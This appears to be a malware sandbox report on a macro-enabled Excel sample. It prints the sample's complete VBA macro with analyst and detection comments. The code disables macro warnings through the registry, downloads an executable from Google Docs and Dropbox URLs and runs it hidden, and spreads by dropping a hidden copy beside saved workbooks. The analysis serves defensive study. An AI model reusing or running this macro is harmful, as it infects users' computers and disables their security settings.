Behavioral task
behavioral1
Sample
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm
Resource
win10v2004-20240802-en
General
-
Target
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976
-
Size
92KB
-
MD5
1b2e1aaaeb6150a77145de383e7953d9
-
SHA1
4f1f7c95e3c8ec019b0e73d0f566477f7076300c
-
SHA256
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976
-
SHA512
4f20917d4ad28644da75db34d610672caf67eff78e2755cfa338ff30750a9f8b3db1cd3c6f0e5f0b19705c8f3096a5c5cf6189c003600d8346313a6ce0494bca
-
SSDEEP
1536:CguZCa6S5khUIeWL/bJC/4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIpF1:CgugapkhleWztC/aPjpM+d/Ms8ULavL9
Malware Config
Signatures
-
resource sample
Files
-
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm office2007
ThisWorkbook
' Analyst notes: VBA module "ThisWorkbook" extracted from the .xlsm sample.
' The viewer's gutter line numbers were fused into the text and are dropped here; one statement per line is restored.
' Code tokens and string literals are unchanged.
' Behaviour visible in this module:
'   - Workbook_Open sets the per-user VBAWarnings policy for Excel and Word, then calls MPS.
'   - MPS runs an executable found next to the workbook or in a "Synaptics" directory, or downloads one.
'   - Workbook_BeforeSave controls how the workbook is written to disk.
'     On "Save As" it also drops a hidden copy of the executable beside the new file.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module-level state used to decide whether Excel should prompt to save on close.
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

' Auto-run entry point: executes when the workbook is opened with macros enabled.
Private Sub Workbook_Open()
    Dim i As Integer
    ' The saved file has most sheets hidden (see Workbook_BeforeSave); restore them all.
    For i = 1 To ActiveWorkbook.Sheets.Count
        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i

    ' Security-setting tamper: VBAWarnings = 1 is the "enable all macros" value.
    ' It is written under HKCU for the running Office version, for both Excel and Word.
    ' Detection: a registry write to ...\Security\VBAWarnings from an Office/WScript.Shell context.
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

    ' Suppresses Excel alert dialogs for the rest of the session.
    Application.DisplayAlerts = False
    SheetCount = Worksheets.Count

    ' Locate/download and launch the executable payload.
    Call MPS

    ActiveWorkbook.Sheets(1).Select
    SheetsChanged = False
End Sub

' If no change was tracked, mark the workbook as saved so closing shows no save prompt.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    If Not SheetsChanged Then
        ActiveWorkbook.Saved = True
    End If
End Sub

' Change tracking: any cell edit marks the workbook as modified.
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
    SheetsChanged = True
End Sub

' Change tracking: adding a sheet marks the workbook as modified.
Private Sub Workbook_NewSheet(ByVal Sh As Object)
    SheetsChanged = True
End Sub

' Change tracking: a changed sheet count (e.g. a deleted sheet) marks the workbook as modified.
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
    If ActiveWorkbook.Sheets.Count <> SheetCount Then
        SheetsChanged = True
        SheetCount = ActiveWorkbook.Sheets.Count
    End If
End Sub

' Intercepts every save. Excel's own save is cancelled (Cancel = True) and the macro saves instead.
' Before saving, all sheets except the last are hidden, so the on-disk file opens showing only the last sheet.
' NOTE(review): the last sheet is presumably a lure / "enable content" page; confirm against the workbook.
' After saving, all sheets are shown again so the user sees no difference.
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    Dim i As Integer
    Dim AIndex As Integer
    Dim FName

    ' Remember the active sheet so it can be re-selected afterwards.
    AIndex = ActiveWorkbook.ActiveSheet.Index

    If SaveAsUI = False Then
        ' Plain "Save" path.
        Cancel = True
        ' Events off so the Save below does not re-enter this handler; screen updates off to hide the sheet toggling.
        Application.EnableEvents = False
        Application.ScreenUpdating = False

        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i
        ActiveWorkbook.Save

        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False

        Application.ScreenUpdating = True
        Application.EnableEvents = True
    Else
        ' "Save As" path: the macro shows its own dialog restricted to *.xlsm.
        Cancel = True
        Application.EnableEvents = False
        Application.ScreenUpdating = False

        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i

        ' NOTE(review): the filter label looks like mis-decoded Turkish text; left exactly as extracted.
        FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")
        If FName <> False Then
            ' The copy is forced to macro-enabled format, so it carries this module with it.
            ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
            ' Drop the executable next to the newly saved workbook.
            SaveAsInj ActiveWorkbook.Path
        End If

        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False

        Application.ScreenUpdating = True
        Application.EnableEvents = True
    End If
End Sub

' Copies %ALLUSERSPROFILE%\Synaptics\Synaptics.exe into DIR as "~$cache1", if that source file exists.
' The copy is then marked hidden + system.
' Detection: a hidden/system file named "~$cache1" beside an .xlsm; the name mimics an Office temp file.
Sub SaveAsInj(DIR As String)
    Dim FSO As Object
    Dim FN As String

    Set FSO = CreateObject("scripting.filesystemobject")
    FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"

    If FSO.FileExists(FN) Then
        If Not FSO.FileExists(DIR & "\~$cache1") Then
            FileCopy FN, DIR & "\~$cache1"
        End If
        ' Attributes are (re)applied even when the file was already present.
        SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
    End If
End Sub

' Reads a registry value via WScript.Shell; errors are suppressed, so a missing key returns "".
' Not called anywhere in this module as shown.
Function RegKeyRead(i_RegKey As String) As String
    Dim myWS As Object

    On Error Resume Next
    Set myWS = CreateObject("WScript.Shell")
    RegKeyRead = myWS.RegRead(i_RegKey)
End Function

' Returns True when RegRead succeeds for the key, False when it raises.
' Not called anywhere in this module as shown.
Function RegKeyExists(i_RegKey As String) As Boolean
    Dim myWS As Object

    On Error GoTo ErrorHandler
    Set myWS = CreateObject("WScript.Shell")
    myWS.RegRead i_RegKey
    RegKeyExists = True
    Exit Function

ErrorHandler:
    RegKeyExists = False
End Function

' Writes a registry value via WScript.Shell.RegWrite (type defaults to REG_SZ).
' Used by Workbook_Open for the VBAWarnings change.
Sub RegKeySave(i_RegKey As String, _
        i_Value As String, _
        Optional i_Type As String = "REG_SZ")
    Dim myWS As Object

    Set myWS = CreateObject("WScript.Shell")
    myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

' Payload launcher. Order of preference, as coded:
'   1. "~$cache1" beside the workbook    -> copied to %TEMP%\~$cache1.exe and run
'   2. "Synaptics.exe" beside the workbook -> copied to %TEMP%\~$cache1.exe and run
'   3. %ALLUSERSPROFILE%\Synaptics\Synaptics.exe -> run in place
'   4. %WINDIR%\System32\Synaptics\Synaptics.exe -> run in place
'   5. %TEMP%\~$cache1.exe missing -> try the download URLs in turn, run if a file was written
'   6. otherwise run the existing %TEMP%\~$cache1.exe
' Every launch uses Shell with vbHide (no visible window).
' Detection: EXCEL.EXE spawning an executable from %TEMP% or a "Synaptics" directory.
Sub MPS()
    Dim FSO As Object
    ' Only URL is typed As String here; FP and TMP are Variants (VBA applies "As" to the last name only).
    Dim FP(1 To 3), TMP, URL(1 To 3) As String

    Set FSO = CreateObject("scripting.filesystemobject")
    FP(1) = ActiveWorkbook.Path & "\~$cache1"
    FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

    ' Network indicators. URL(2) and URL(3) are identical in this sample.
    URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
    URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    TMP = Environ("Temp") & "\~$cache1.exe"

    If FSO.FileExists(FP(1)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(1), TMP
        End If
        Shell TMP, vbHide
    ElseIf FSO.FileExists(FP(2)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(2), TMP
        End If
        Shell TMP, vbHide
    Else
        If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
            Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
        ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
            Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
        ElseIf Not FSO.FileExists(TMP) Then
            ' Empty If/ElseIf bodies: the chain only serves to stop at the first download that reports success.
            If FDW((URL(1)), (TMP)) Then
            ElseIf FDW((URL(2)), (TMP)) Then
            ElseIf FDW((URL(3)), (TMP)) Then
            End If
            If FSO.FileExists(TMP) Then
                Shell TMP, vbHide
            End If
        Else
            Shell TMP, vbHide
        End If

    End If

End Sub

' Downloader: synchronous HTTP GET of MYU via WinHttpRequest; the raw response body is written to path NMA.
' Returns True only for HTTP 200 whose text contains none of three known error-page markers.
' WinHttpReq and oStream are not declared in this function (implicit variables).
' Detection: WinHTTP traffic from an Office process carrying the user-agent string set below.
Function FDW(MYU, NMA As String) As Boolean
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    ' NOTE(review): no On Error handler is visible in this function.
    ' A failed CreateObject would therefore likely raise rather than reach this fallback.
    If WinHttpReq Is Nothing Then
        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
    End If

    ' Option 0 = user-agent string; Option 6 = enable redirects.
    ' NOTE(review): AllowRedirects is not defined in this module, so it presumably evaluates to Empty; confirm.
    WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    WinHttpReq.Option(6) = AllowRedirects
    WinHttpReq.Open "GET", MYU, False
    WinHttpReq.Send

    If (WinHttpReq.Status = 200) Then
        ' Reject error pages that the hosting services return with a 200 status.
        If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
            FDW = True
            Set oStream = CreateObject("ADODB.Stream")
            oStream.Open
            ' Type 1 = binary stream.
            oStream.Type = 1
            oStream.Write WinHttpReq.ResponseBody
            oStream.SaveToFile (NMA)
            oStream.Close
        Else
            FDW = False
        End If
    Else
        FDW = False
    End If
End Function
